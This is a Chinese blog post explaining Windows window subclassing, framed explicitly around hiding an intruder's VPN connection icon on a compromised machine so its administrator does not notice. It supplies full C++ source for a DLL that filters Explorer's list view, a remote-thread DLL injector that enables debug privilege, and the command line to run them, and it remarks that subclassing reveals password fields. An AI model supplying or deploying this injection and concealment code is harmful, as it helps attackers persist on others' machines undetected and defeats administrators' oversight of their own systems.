利用窗口子类化隐藏系统图标

最新推荐文章于 2022-03-07 11:48:07 发布
最新推荐文章于 2022-03-07 11:48:07 发布
阅读量586 收藏 1
点赞数
分类专栏: C/C++ 相关 文章标签: null vpn dll callback mfc report
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zshwlw/article/details/3514594
版权
下载源代码
窗口子类化是一种非常有用的技术,通常它用在Windows GUI编程方面,我们用这种技术来创建新的控件,比如让SubClassing一个Edit控件添加一些消息处理让它变成MaskEdit控件等等.反过 来想想如果我们SubClassing一个有ES_PASSWORD风格的窗口控件,得到它的密码是难是吗?很简单,不过是一句 CallWindowProc调用,只不过在NT等系统上需要Inject一个DLL到目标进程来SubClassing一个进程中的窗口或是子窗口.

用Spy ++看了一下,资源管理器里列表视图其实就是一个SysListView32控件,我们现在就是要"创建一个新的SysListView32控件",让它 不显示带有"VPN"字符串的图标.有时我们控制了一台肉机,用VPN拨进去,但又不想管理员发现它,肯定要隐藏很多东西,隐藏图标是最直观的一种.

先来看看三个API:

SetWindowLong
SetClassLong
CallWindowProc

SetWindowLong可以改变一个窗口实例的窗口过程,它的作用范围仅仅是一个窗口.

SetClassLong虽然操作的是一个窗口句柄,但作用却是对创建这个窗口的窗口类进行修改,我们可以让它修改进程范围内某种窗口类的窗口过程,这里指的窗口类是User32窗口对象类,而不是MFC或是VCL窗口封装类.
顺便提一下改变一个进程中的基本控件类也可以影响到它的超类,比如Delphi VCL使用超类化来创建控件,首先它会调用GetClassInfo得到某个类的系统窗口过程或风格等参数,比如SysListView32窗口类,然后 用得到参数再注册(RegistetClass)一个TListView窗口类,能够在它GetClassInfo前先用SetClassLong子类化 了某个窗口类,就可以实现其超类(如,TListView)的消息过滤.

而CallWindowProc通常在我们处理完消息后再调用以实现控件基本的功能,因为我们可没有时间写一个完整的EDIT控件或是SysListView32控件.

废话不多说.
一个实例Explorer.dll,它在Explorer.exe进程子类化"SysListView32"窗口类,然后过滤掉带有"VPN"字符串(不区分大小写)的图标,我使用了一个Magic Number,就是当图标少于32个时才进行搜索过滤,也就是说我假定系统中的网络连接不超过32个,这样做是为了提高程序性能,我们不去搜索很大的文件夹.程序由VC++ 6.0 sp5编译通过,Windows 2000 Professional下运行调试通过.使用方式是用远程线程注入到explorer.exe进程即可,而后在explorer.exe新打开/创建的窗口中生效.

过滤程序(explorer.cpp) 

#include "stdafx.h"
#include <windows.h>
#include <CommCtrl.h>
#include <process.h>
#include <tchar.h>
#include <shlwapi.h>

#define MAGIC_NUMBER    (0x20)
WNDPROC lpfnSupperClassProc=NULL;

__forceinline
void HideItem(HWND hListCtrl,DWORD dwItemcount)
{
    LVITEM li={0};
    char text[50]={0};
    li.pszText=text;
    li.cchTextMax=50;
    
    for(DWORD i=0;i<dwItemcount;i++)
    {
        CallWindowProc(lpfnSupperClassProc,hListCtrl,LVM_GETITEMTEXT,i,(LPARAM)&li);
        
        if(StrStrI(li.pszText,_T("vpn"))!=NULL)
            CallWindowProc(lpfnSupperClassProc,hListCtrl,LVM_DELETEITEM,i,0);
    }
}

LRESULT CALLBACK ListFilterProc(HWND hwnd,UINT uMsg,WPARAM wParam,LPARAM lParam)
{
    DWORD dwItemcount=0;
    if(WM_PAINT==uMsg)
    {
        dwItemcount=CallWindowProc(lpfnSupperClassProc,hwnd,LVM_GETITEMCOUNT,0,0);
        if(dwItemcount<MAGIC_NUMBER)
            HideItem(hwnd,dwItemcount);
    }
        
    return CallWindowProc(lpfnSupperClassProc,hwnd,uMsg,wParam,lParam);
}

__forceinline
BOOL InstallListFilter()
{
    BOOL bRet=FALSE;
    HWND hWnd=NULL;
    
    INITCOMMONCONTROLSEX cls={sizeof(INITCOMMONCONTROLSEX),ICC_WIN95_CLASSES};
    bRet=InitCommonControlsEx(&cls);

    if(bRet)
    {
        hWnd=CreateWindow(_T("SysListView32"),_T(""),WS_CAPTION|LVS_REPORT,0,0,0,0,
				NULL,NULL,NULL,NULL);

        lpfnSupperClassProc=(WNDPROC)GetClassLong(hWnd,GCL_WNDPROC);
        SetClassLong(hWnd,GCL_WNDPROC,(LONG)ListFilterProc);
        
        DestroyWindow(hWnd);
    }
    
    return bRet;
}

BOOL APIENTRY DllMain(HANDLE hModule,DWORD ul_reason_for_call, LPVOID lpReserved)
{
    if(DLL_PROCESS_ATTACH==ul_reason_for_call)    
        InstallListFilter();
    return TRUE;
}

注入程序:InjectDLL.cpp 

#include <Windows.h>
#include <tlhelp32.h>
#include <stdio.h>
#include <conio.h>

BOOL EnablePrivilege(char *PrviName)
{
	HANDLE hToken;
	TOKEN_PRIVILEGES Newtp;
	BOOL bRet=FALSE;

	OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES,&hToken);
	if(LookupPrivilegeValue(NULL,PrviName,&Newtp.Privileges[0].Luid))
	{
		Newtp.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED;
		Newtp.PrivilegeCount=1;
		if(AdjustTokenPrivileges(hToken,FALSE,&Newtp,sizeof(Newtp),NULL,NULL))
			bRet=TRUE;
	}
	
	CloseHandle(hToken);

	return bRet;
}

DWORD Process2PID(LPCTSTR lpszProcess)
{
	HANDLE hSnap=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
	PROCESSENTRY32 pe;
	DWORD dwRet=0;
	pe.dwSize=sizeof(PROCESSENTRY32);
	if(hSnap)
	{
		Process32First(hSnap,&pe);
		do {
			if(!lstrcmpi(lpszProcess,pe.szExeFile))
			{
				dwRet=pe.th32ProcessID;
				break;
			}
		} while(Process32Next(hSnap,&pe));
		CloseHandle(hSnap);
	}
	return dwRet;
}

BOOL InjectDLL(DWORD dwPid,LPCTSTR lpszDll)
{
	if(!EnablePrivilege(SE_DEBUG_NAME))
		return FALSE;
	BOOL bRet=FALSE;
	HANDLE hProcess=
		OpenProcess(PROCESS_CREATE_THREAD|PROCESS_VM_OPERATION|PROCESS_VM_WRITE,FALSE,dwPid);
	LPVOID pAddr=VirtualAllocEx(hProcess,NULL,MAX_PATH,MEM_COMMIT,PAGE_READWRITE);
	WriteProcessMemory(hProcess,pAddr,lpszDll,lstrlen(lpszDll)+1,NULL);
	LPTHREAD_START_ROUTINE pfnLoadLibrary=
		(LPTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandle("kernel32.dll"),"LoadLibraryA");
	bRet=(BOOL)CreateRemoteThread(hProcess,NULL,1024,pfnLoadLibrary,pAddr,0,NULL);
	CloseHandle(hProcess);
	return bRet;
}

int main(int argc,char **argv)
{
	printf("Inject DLL to explorer.exe %s/n",
		InjectDLL(Process2PID(argv[1]),argv[2])?"successful":"failed");
	getch();
	return 0;
}

将两个分别编译好后用下面的命令行: 
injectDLL explorer.exe d:/wjj/explorer/debug/explorer.dll
d:/wjj/explorer/debug/explorer.dll一定要用绝对路径,那是我用的工作目录,你可以把explorer.dll放在其它任意地方 我更喜欢用中规中矩的"窗口子类化"来称乎这种技术,当然也可以叫它"窗口劫持"
zshwlw
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
利用窗口子类隐藏系统图标VC源代码
03-15
本代码演示了如何利用窗口子类技术隐藏系统图标 关键字:subclass,SetWindowLong,SetClassLong,CallWindowProc,子类,隐藏系统图标
MFC-- 子类控件
xinzhiyounizhiyouni的专栏
12-31 2516
首先讲讲什么是子类,其实子类很好理解,和以前一样,仍然从win32 sdk方法开始,在这里也可以补充一下,我在一些群里的见到有些人关于MFC的说法,说直接就学MFC就可以了,没必要学win32,有的人把MFC说的很简单似的,其实不然,由于MFC对底层的隐藏和其复杂的框架,其实很多时候,我们学起来是很吃力的,而且,很多人照着一些编程书说的照着做,改来改去,最后做出来了,但是不知道其中的原理,当需
如何将窗口最小系统托盘
Michael的专栏
08-24 4184
编写托盘程序主要解决两个问题:   (1)创建、修改、删除托盘;   (2)如何对托 盘接收到的消息进行处理。   这就要用到几个Windows API函数。   首先,Shell_NotifyIcon是用于托盘的Shell API。该API用到一个NOTIFYICONDATA结构.   Type NOTIFYICONDATA     cbSize As Long 该结构所占字节数     hw
操作系统笔记(一)(随笔)
w114406415的博客
03-07 2750
随笔
【LibUIDK界面库系列文章】制作个性桌面图标
psbeyond的专栏
10-02 818
本文详细讨论了如何实现桌面动态图标,以及一些注意事项。
利用窗口子类技术实现隐藏系统托盘区的图标.zip
03-28
利用窗口子类技术实现隐藏系统托盘区的图标.zip
商业编程-源码-本代码演示了如何利用窗口子类技术隐藏系统图标.zip
06-22
商业编程-源码-本代码演示了如何利用窗口子类技术隐藏系统图标.zip
易语言源码易语言窗口子类例程源码.rar
02-21
易语言源码易语言窗口子类例程源码.rar 易语言源码易语言窗口子类例程源码.rar 易语言源码易语言窗口子类例程源码.rar 易语言源码易语言窗口子类例程源码.rar 易语言源码易语言窗口子类例程源码.rar ...
易语言窗口过程子类
07-21
易语言窗口过程子类源码,窗口过程子类
通过线程ID获得窗口句柄的方法
01-29 7349
首先创建进程:STARTUPINFO si;PROCESS_INFORMATION pi;    if( !CreateProcess( NULL, // No module name (use command line).         "11111//111.exe", // Command line.         NULL,             // Process han
通过进程获取窗口的句柄
01-03 3936
通过 EnumWindows 枚举所有窗口的句柄,利用 GetWindowThreadProcessId 获取窗口句柄与查找的进程ID比较以获得查找进程的窗口的句柄。BOOL CALLBACK EnumWindowsProc(HWND hwnd, LPARAM lparam) {   DWORD threadid;  GetWindowThreadProcessId(hwnd,&threadi
隐藏指定程序托盘图标的方法
01-09 3064
#include HWND hWnd,hWndTmp; unsigned long lngPID; long ret,lngButtons; HANDLE hProcess; LPVOID lngAddress; long lngTextAdr,lngHwndAdr,lngHwnd,lngButtonID; char strBuff[1024]={0}; char* str = NULL; h
windows添加或删除程序中的程序在注册表中的位置
12-15 2960
Windows Registry Editor Version 5.00[HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Uninstall/WebTV我的网络电视]"DisplayIcon"="d://STV//STV.exe""DisplayName"="WebTV我的网络电视""DisplayVersion"="1
ModifyStyle
11-29 2225
1.作用:Call this member function to modify a windows style.2.函数原型:BOOL ModifyStyle(  DWORD dwRemove,  DWORD dwAdd,  UINT   nFlags);3.参数含义:ModifyStyle是窗口类的成员函数控件类继承之CWnd因此它也是控件类的成员函数
对话框控件被窗口背景遮挡住的问题
03-25 1789
自绘窗口背景的时候,如果在OnPaint方法中进行重画窗口的背景,当窗口移动的时候控件会被背景遮挡住。后来发现,如果在OnPaint方法中把控件地位置用MoveWindow方法改变一下,那么就会被显示出来,可能是因为:如果控件地位置不变,那么当窗口重画的时候就会把原有的控件图像复制回去,而不是重画。后来又发现有InvalidateRect和validateRect两个函数,InvalidateRe
CStatic响应消息
11-29 1604
1.修改控件ID2.勾上Notify重载了CStatic类 CMyStatic,并在视图类里定义了一个CMyStatic对象;但是我重载的 ON_WM_RBUTTONDBLCLK() ON_WM_RBUTTONDOWN() ON_WM_LBUTTONDOWN() ON_WM_NCMBUTTONDOWN()BOOL CMyStatic::PreSubclassWindow(){    Mod
透明浮动窗口
12-21 1231
编译环境 WIN2000以上操作系统,VC++6.0。技术原理如何实现透明窗口    首先,从CWnd派生一个类 CfloatWnd,在Create 函数里加载位图,在OnPaint函数里绘制位图,详见源代码 。  使用SetLayeredWindowAttributes可以方便的制作透明窗体,此函数在w2k以上才支持,而且如果希望直接使用的话,可能需要下载最新的SDK。不过此
子类(subclass)
最新发布
03-08
子类(subclass)是面向对象编程中的一个概念,指的是创建一个新的类,该类继承了一个已有的类的属性和方法,并且可以添加新的属性和方法。子类可以帮助程序员更好地组织代码,提高代码的可重用性和可维护性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值